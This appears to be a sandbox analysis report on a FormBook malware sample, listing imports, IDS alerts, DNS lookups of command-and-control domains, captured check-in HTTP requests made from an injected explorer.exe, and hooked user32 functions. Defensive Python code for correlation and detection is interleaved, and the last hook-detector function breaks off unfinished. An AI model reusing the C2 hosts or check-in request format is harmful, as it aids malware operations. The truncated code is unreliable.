KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/11/21-11:38:41.596097 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.3 | 104.21.29.70
06/11/21-11:38:41.596097 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.3 | 104.21.29.70
06/11/21-11:38:41.596097 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49747 | 80 | 192.168.2.3 | 104.21.29.70
06/11/21-11:39:01.004425 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49750 | 34.102.136.180 | 192.168.2.3

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 11, 2021 11:38:41.553481102 CEST | 49747 | 80 | 192.168.2.3 | 104.21.29.70
Jun 11, 2021 11:38:41.595850945 CEST | 80 | 49747 | 104.21.29.70 | 192.168.2.3
Jun 11, 2021 11:38:41.595957041 CEST | 49747 | 80 | 192.168.2.3 | 104.21.29.70
Jun 11, 2021 11:38:41.596096992 CEST | 49747 | 80 | 192.168.2.3 | 104.21.29.70
Jun 11, 2021 11:38:41.638364077 CEST | 80 | 49747 | 104.21.29.70 | 192.168.2.3
Jun 11, 2021 11:38:42.096560001 CEST | 49747 | 80 | 192.168.2.3 | 104.21.29.70
Jun 11, 2021 11:38:42.141098976 CEST | 80 | 49747 | 104.21.29.70 | 192.168.2.3
Jun 11, 2021 11:38:42.143011093 CEST | 49747 | 80 | 192.168.2.3 | 104.21.29.70
Jun 11, 2021 11:39:00.816756964 CEST | 49750 | 80 | 192.168.2.3 | 34.102.136.180
Jun 11, 2021 11:39:00.860651016 CEST | 80 | 49750 | 34.102.136.180 | 192.168.2.3
Jun 11, 2021 11:39:00.860801935 CEST | 49750 | 80 | 192.168.2.3 | 34.102.136.180
Jun 11, 2021 11:39:00.861119986 CEST | 49750 | 80 | 192.168.2.3 | 34.102.136.180
Jun 11, 2021 11:39:00.903263092 CEST | 80 | 49750 | 34.102.136.180 | 192.168.2.3
Jun 11, 2021 11:39:01.004425049 CEST | 80 | 49750 | 34.102.136.180 | 192.168.2.3
Jun 11, 2021 11:39:01.004502058 CEST | 80 | 49750 | 34.102.136.180 | 192.168.2.3
Jun 11, 2021 11:39:01.004724026 CEST | 49750 | 80 | 192.168.2.3 | 34.102.136.180
Jun 11, 2021 11:39:01.004793882 CEST | 49750 | 80 | 192.168.2.3 | 34.102.136.180
Jun 11, 2021 11:39:01.046962023 CEST | 80 | 49750 | 34.102.136.180 | 192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 11, 2021 11:36:58.467942953 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:36:58.518048048 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:36:59.447951078 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:36:59.497910976 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:00.374031067 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:00.424078941 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:01.205167055 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:01.260135889 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:02.118025064 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:02.169770002 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:03.452197075 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:03.507711887 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:04.508501053 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:04.573848963 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:06.010664940 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:06.065388918 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:06.892235041 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:06.942306995 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:07.770050049 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:07.823528051 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:09.380112886 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:09.433016062 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:10.276912928 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:10.327306032 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:11.057784081 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:11.107798100 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:12.032434940 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:12.082403898 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:12.853564024 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:12.903722048 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:13.670710087 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:13.721008062 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:14.982156038 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:15.035181046 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:30.540622950 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:30.609957933 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:36.929832935 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:36.992439032 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:37:53.923386097 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:37:53.986794949 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:38:17.375897884 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:38:17.520206928 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:38:18.109930992 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:38:18.168560982 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:38:18.626332998 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:38:18.689140081 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:38:18.856791019 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:38:18.916877985 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:38:19.445235014 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:38:19.562400103 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:38:19.637095928 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:38:19.733454943 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:38:20.300620079 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:38:20.360088110 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:38:20.994693041 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:38:21.053555965 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:38:21.667176962 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:38:21.730510950 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:38:22.316395998 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:38:22.377222061 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:38:22.517118931 CEST | 61946 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:38:22.567471981 CEST | 53 | 61946 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:38:23.346878052 CEST | 64910 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:38:23.408225060 CEST | 53 | 64910 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:38:23.875382900 CEST | 52123 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:38:23.937048912 CEST | 53 | 52123 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:38:41.481421947 CEST | 56130 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:38:41.552371025 CEST | 53 | 56130 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:38:42.869371891 CEST | 56338 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:38:42.945235968 CEST | 53 | 56338 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:38:44.144849062 CEST | 59420 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:38:44.212188959 CEST | 53 | 59420 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:39:00.753635883 CEST | 58784 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:39:00.815494061 CEST | 53 | 58784 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 11:39:23.180476904 CEST | 63978 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 11:39:23.242651939 CEST | 53 | 63978 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 11, 2021 11:38:18.626332998 CEST | 192.168.2.3 | 8.8.8.8 | 0x8b6 | Standard query (0) | www.dollysusmitha.com | A (IP address) | IN (0x0001)
Jun 11, 2021 11:38:41.481421947 CEST | 192.168.2.3 | 8.8.8.8 | 0xce40 | Standard query (0) | www.cpf3life.com | A (IP address) | IN (0x0001)
Jun 11, 2021 11:39:00.753635883 CEST | 192.168.2.3 | 8.8.8.8 | 0xf502 | Standard query (0) | www.phonetomouth.com | A (IP address) | IN (0x0001)
Jun 11, 2021 11:39:23.180476904 CEST | 192.168.2.3 | 8.8.8.8 | 0xaefa | Standard query (0) | www.gicc-fx.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 11, 2021 11:38:18.689140081 CEST | 8.8.8.8 | 192.168.2.3 | 0x8b6 | No error (0) | www.dollysusmitha.com | www.dollysusmitha.com.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 11:38:41.552371025 CEST | 8.8.8.8 | 192.168.2.3 | 0xce40 | No error (0) | www.cpf3life.com | | 104.21.29.70 | A (IP address) | IN (0x0001)
Jun 11, 2021 11:38:41.552371025 CEST | 8.8.8.8 | 192.168.2.3 | 0xce40 | No error (0) | www.cpf3life.com | | 172.67.148.145 | A (IP address) | IN (0x0001)
Jun 11, 2021 11:39:00.815494061 CEST | 8.8.8.8 | 192.168.2.3 | 0xf502 | No error (0) | www.phonetomouth.com | phonetomouth.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 11:39:00.815494061 CEST | 8.8.8.8 | 192.168.2.3 | 0xf502 | No error (0) | phonetomouth.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 11, 2021 11:39:23.242651939 CEST | 8.8.8.8 | 192.168.2.3 | 0xaefa | No error (0) | www.gicc-fx.com | | 198.252.100.204 | A (IP address) | IN (0x0001)
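Four names are resolved above, but the TCP Packets table earlier in this report shows connections to only two addresses. The Python below is an added example, not part of the Joe Sandbox report: it joins the DNS answers (following CNAME chains within the same capture) with the outbound TCP flows and reports which name each connection went to, which names resolved to an address that was never contacted within the capture window (www.gicc-fx.com), and which received only a CNAME and no address at all (www.dollysusmitha.com). The rows are transcribed from the two tables; the local address 192.168.2.3 is the sandbox VM as shown in the capture.

```python
"""Added example: join the DNS Answers with the outbound TCP flows of this
report. Not part of the Joe Sandbox report; rows are transcribed from it."""
from collections import defaultdict

LOCAL = "192.168.2.3"  # the sandbox VM, as in the capture

# (name, rdata, rtype), transcribed from the DNS Answers table
DNS_ANSWERS = [
    ("www.dollysusmitha.com", "www.dollysusmitha.com.cdn.cloudflare.net", "CNAME"),
    ("www.cpf3life.com", "104.21.29.70", "A"),
    ("www.cpf3life.com", "172.67.148.145", "A"),
    ("www.phonetomouth.com", "phonetomouth.com", "CNAME"),
    ("phonetomouth.com", "34.102.136.180", "A"),
    ("www.gicc-fx.com", "198.252.100.204", "A"),
]

# (src_ip, src_port, dst_ip, dst_port) for the first packets of each flow in the
# TCP Packets table; later packets of the same flow add nothing here
TCP_PACKETS = [
    (LOCAL, 49747, "104.21.29.70", 80),
    ("104.21.29.70", 80, LOCAL, 49747),
    (LOCAL, 49750, "34.102.136.180", 80),
    ("34.102.136.180", 80, LOCAL, 49750),
]


def resolve_chain(answers) -> dict:
    """name -> set of IPv4 addresses it resolves to, following CNAMEs seen in the capture."""
    cnames, addrs = defaultdict(set), defaultdict(set)
    for name, rdata, rtype in answers:
        if rtype == "CNAME":
            cnames[name].add(rdata)
        elif rtype == "A":
            addrs[name].add(rdata)

    def follow(name, seen=()):
        if name in seen:  # a CNAME loop must not recurse forever
            return set()
        ips = set(addrs.get(name, ()))
        for target in cnames.get(name, ()):
            ips |= follow(target, seen + (name,))
        return ips

    return {name: follow(name) for name in set(cnames) | set(addrs)}


def outbound_flows(packets, local=LOCAL) -> set:
    """Distinct (dst_ip, dst_port) pairs the local host opened."""
    return {(dst, dport) for src, _sport, dst, dport in packets if src == local}


def correlate(answers, packets, local=LOCAL) -> dict:
    names = resolve_chain(answers)
    ip_to_names = defaultdict(set)
    for name, ips in names.items():
        for ip in ips:
            ip_to_names[ip].add(name)
    flows = outbound_flows(packets, local)
    contacted = {ip for ip, _port in flows}
    return {
        # every connection, labelled with the name(s) that resolved to its address
        "contacted": {f"{ip}:{port}": sorted(ip_to_names.get(ip) or {"<no DNS answer in capture>"})
                      for ip, port in sorted(flows)},
        # resolved to an address, but no flow to it within the capture window
        "resolved_not_contacted": sorted(n for n, ips in names.items() if ips and not ips & contacted),
        # answered only with a CNAME, no A record in the capture
        "cname_only": sorted(n for n, ips in names.items() if not ips),
    }


if __name__ == "__main__":
    for key, value in correlate(DNS_ANSWERS, TCP_PACKETS).items():
        print(key, value)
```

The same join works on a full pcap export: feed every A and CNAME answer plus every outbound SYN, and the "resolved_not_contacted" list is the set of names to keep watching for, while the "contacted" map is what goes into the block list with its name attached.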

HTTP Request Dependency Graph

• www.cpf3life.com
• www.phonetomouth.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49747 | 104.21.29.70 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 11:38:41.596096992 CEST | 5863 | OUT | GET /uer0/?cT=IWphFoHV4jp5oknFMScIxRoUR2WJRPQs/XYBCw5pT/o6GbblNl6C3qYdj4q6OTOtoDPc&0rjL0=00GhNj0PalVPThz HTTP/1.1
Host: www.cpf3life.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii: (seven NUL bytes, nothing printable)


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49750 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 11:39:00.861119986 CEST | 5905 | OUT | GET /uer0/?0rjL0=00GhNj0PalVPThz&cT=mzn46ufhhzCxwm8qeMWDu5BECFFcgbpMb+xr4Y5+z9rgY/t3xuFClMCjGCpTywHehpEI HTTP/1.1
Host: www.phonetomouth.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii: (seven NUL bytes, nothing printable)
Jun 11, 2021 11:39:01.004425049 CEST | 5905 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Fri, 11 Jun 2021 09:39:00 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60c03ab8-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
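Both requests above share the shape the three Snort FormBook rules fired on: a bare GET issued by explorer.exe to a short path (/uer0/) with two query parameters, one a long base64-looking blob and the other a short token, Connection: close, no User-Agent, and a seven-byte body of NULs on a GET. The Python below is an added example, not part of the Joe Sandbox report and not the logic of the Emerging Threats signatures: it parses raw HTTP/1.x requests and scores those traits, replaying the two captured requests (transcribed from the table above) and one constructed benign request. The score threshold and the set of client processes treated as suspicious are assumptions.

```python
"""Added example: score raw HTTP requests against the traits of the FormBook
check-in captured in this report. Not the Emerging Threats rule logic; the
threshold and the process list are assumptions."""
import re

B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
SHORT_PATH = re.compile(r"/[A-Za-z0-9]{2,8}/")
# processes that have no business issuing raw HTTP GETs themselves (assumption)
SUSPICIOUS_CLIENTS = {"explorer.exe"}

# Transcribed from the HTTP Packets table; the 7-byte body of NULs is the
# "Data Raw" shown there.
CHECKIN_1 = ("GET /uer0/?cT=IWphFoHV4jp5oknFMScIxRoUR2WJRPQs/XYBCw5pT/o6GbblNl6C3qYdj4q6OTOtoDPc"
             "&0rjL0=00GhNj0PalVPThz HTTP/1.1\r\nHost: www.cpf3life.com\r\nConnection: close\r\n\r\n"
             + "\x00" * 7)
CHECKIN_2 = ("GET /uer0/?0rjL0=00GhNj0PalVPThz&cT=mzn46ufhhzCxwm8qeMWDu5BECFFcgbpMb+xr4Y5+z9rgY/"
             "t3xuFClMCjGCpTywHehpEI HTTP/1.1\r\nHost: www.phonetomouth.com\r\nConnection: close\r\n\r\n"
             + "\x00" * 7)
# Constructed benign request for contrast (not from the capture)
BENIGN = ("GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n"
          "Connection: keep-alive\r\n\r\n")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, path, ordered query params, headers, body."""
    head, _sep, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    path, _q, query = target.partition("?")
    # split by hand: urllib's parse_qsl would turn '+' inside the blob into a space
    params = [tuple(p.split("=", 1)) if "=" in p else (p, "") for p in query.split("&") if p]
    headers = {}
    for line in header_lines:
        key, _c, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": method, "version": version, "path": path,
            "params": params, "headers": headers, "body": body}


def score_checkin(req: dict, process: str = "") -> tuple:
    """Return (score, reasons); each trait of the captured check-in adds one point."""
    reasons = []
    if req["method"] == "GET" and SHORT_PATH.fullmatch(req["path"]):
        reasons.append("bare GET to a short single-segment path")
    values = [v for _k, v in req["params"]]
    if len(values) == 2:
        blob, token = sorted(values, key=len, reverse=True)
        if B64_BLOB.fullmatch(blob) and 8 <= len(token) <= 24 and token.isalnum():
            reasons.append("one long base64-like blob plus one short token in the query")
    if req["headers"].get("connection", "").lower() == "close":
        reasons.append("Connection: close")
    if "user-agent" not in req["headers"]:
        reasons.append("no User-Agent header")
    if req["method"] == "GET" and req["body"] and set(req["body"]) == {"\x00"}:
        reasons.append("GET carries a body of NUL bytes")
    if process.lower().replace("/", "\\").rsplit("\\", 1)[-1] in SUSPICIOUS_CLIENTS:
        reasons.append(f"issued by {process}")
    return len(reasons), reasons


def is_formbook_checkin(raw: str, process: str = "", threshold: int = 4) -> bool:
    """Verdict: at least `threshold` of the six traits present (threshold is an assumption)."""
    return score_checkin(parse_request(raw), process)[0] >= threshold


if __name__ == "__main__":
    for label, raw, proc in [("checkin-1", CHECKIN_1, r"C:\Windows\explorer.exe"),
                             ("checkin-2", CHECKIN_2, r"C:\Windows\explorer.exe"),
                             ("benign", BENIGN, r"C:\Program Files\Browser\browser.exe")]:
        score, reasons = score_checkin(parse_request(raw), proc)
        print(label, score, reasons)
```

Both captured requests score all six traits and the benign one scores none. The process name is the strongest single signal here: the page's own "System process connects to network" finding is exactly that explorer.exe, not the dropped executable, made these requests, so a proxy or EDR rule that keys on the client process catches the injection even if the URL pattern changes.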


Code Manipulations

User Modules

Hook Summary

Function Name    Hook Type    Active in Processes
PeekMessageA     INLINE       explorer.exe
PeekMessageW     INLINE       explorer.exe
GetMessageW      INLINE       explorer.exe
GetMessageA      INLINE       explorer.exe

Processes

Process: explorer.exe, Module: user32.dll
Function Name    Hook Type    New Data
PeekMessageA     INLINE       0x48 0x8B 0xB8 0x86 0x6E 0xE3
PeekMessageW     INLINE       0x48 0x8B 0xB8 0x8E 0xEE 0xE3
GetMessageW      INLINE       0x48 0x8B 0xB8 0x8E 0xEE 0xE3
GetMessageA      INLINE       0x48 0x8B 0xB8 0x86 0x6E 0xE3
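The hook table above records the "Modifies the prolog of user mode functions" signature from the summary: four user32.dll message-loop exports in explorer.exe now begin with bytes the sample wrote there. The following is an added example, not code from the report or from Joe Sandbox, showing how an analyst verifies such hooks: diff the live prolog against a clean copy of the same function and only then try to label the stub. The report does not give the clean bytes or the function addresses, so `CONSTRUCTED_CLEAN` is a placeholder prolog of this example's own making (the real reference must come from the on-disk user32.dll of the analysed system, relocated to the load address), and the function names, byte strings and `REPORT_HOOKS` dictionary are taken from the table.

```python
"""Detect and classify inline hooks on function prologs by byte diff.

Added example, not part of the sandbox report. The reliable check is the
diff against a clean prolog; opcode patterns only help label the patch.
CONSTRUCTED_CLEAN below is a stand-in, not user32's real bytes.
"""
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# "New Data" column of the report: first six bytes of each hooked prolog in explorer.exe.
REPORT_HOOKS = {
    "PeekMessageA": "0x48 0x8B 0xB8 0x86 0x6E 0xE3",
    "PeekMessageW": "0x48 0x8B 0xB8 0x8E 0xEE 0xE3",
    "GetMessageW":  "0x48 0x8B 0xB8 0x8E 0xEE 0xE3",
    "GetMessageA":  "0x48 0x8B 0xB8 0x86 0x6E 0xE3",
}
# Constructed stand-in for an unhooked prolog (mov [rsp+8],rbx; push rdi; sub rsp,20h).
CONSTRUCTED_CLEAN = bytes.fromhex("48895c2408574883ec20")


@dataclass
class HookFinding:
    function: str
    kind: str               # jmp_rel32 | jmp_rip_indirect | mov_rax_jmp_rax | push_ret | unknown_patch
    patched_len: int        # index of the last differing byte + 1
    target: Optional[int]   # decoded trampoline destination (or pointer slot), if recognised


def parse_hex_bytes(text: str) -> bytes:
    """Turn the report's '0x48 0x8B ...' notation into bytes."""
    return bytes(int(tok, 16) for tok in text.split())


def classify_trampoline(code: bytes, func_addr: int) -> Tuple[str, Optional[int]]:
    """Recognise the usual x64 inline-hook stubs and resolve where they go."""
    mask = 0xFFFFFFFFFFFFFFFF
    if len(code) >= 5 and code[0] == 0xE9:                         # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp_rel32", (func_addr + 5 + rel) & mask
    if len(code) >= 6 and code[:2] == b"\xff\x25":                 # jmp qword ptr [rip+disp32]
        disp = struct.unpack_from("<i", code, 2)[0]
        return "jmp_rip_indirect", (func_addr + 6 + disp) & mask   # address of the pointer slot
    if len(code) >= 12 and code[:2] == b"\x48\xb8" and code[10:12] == b"\xff\xe0":
        return "mov_rax_jmp_rax", struct.unpack_from("<Q", code, 2)[0]   # mov rax, imm64; jmp rax
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:     # push imm32; ret
        return "push_ret", struct.unpack_from("<I", code, 1)[0]
    return "unknown_patch", None


def detect_inline_hooks(clean: Dict[str, bytes], live: Dict[str, bytes],
                        addrs: Dict[str, int]) -> List[HookFinding]:
    """Report every function whose live prolog differs from its clean prolog."""
    findings = []
    for name, live_bytes in live.items():
        ref = clean.get(name)
        if ref is None:
            continue                                   # nothing to compare against
        n = min(len(live_bytes), len(ref))
        diffs = [i for i in range(n) if live_bytes[i] != ref[i]]
        if not diffs:
            continue                                   # prolog intact
        kind, target = classify_trampoline(live_bytes, addrs.get(name, 0))
        findings.append(HookFinding(name, kind, diffs[-1] + 1, target))
    return findings


def report_findings() -> List[HookFinding]:
    """Run the check over the four functions listed in the report."""
    live = {n: parse_hex_bytes(h) for n, h in REPORT_HOOKS.items()}
    clean = {n: CONSTRUCTED_CLEAN for n in REPORT_HOOKS}
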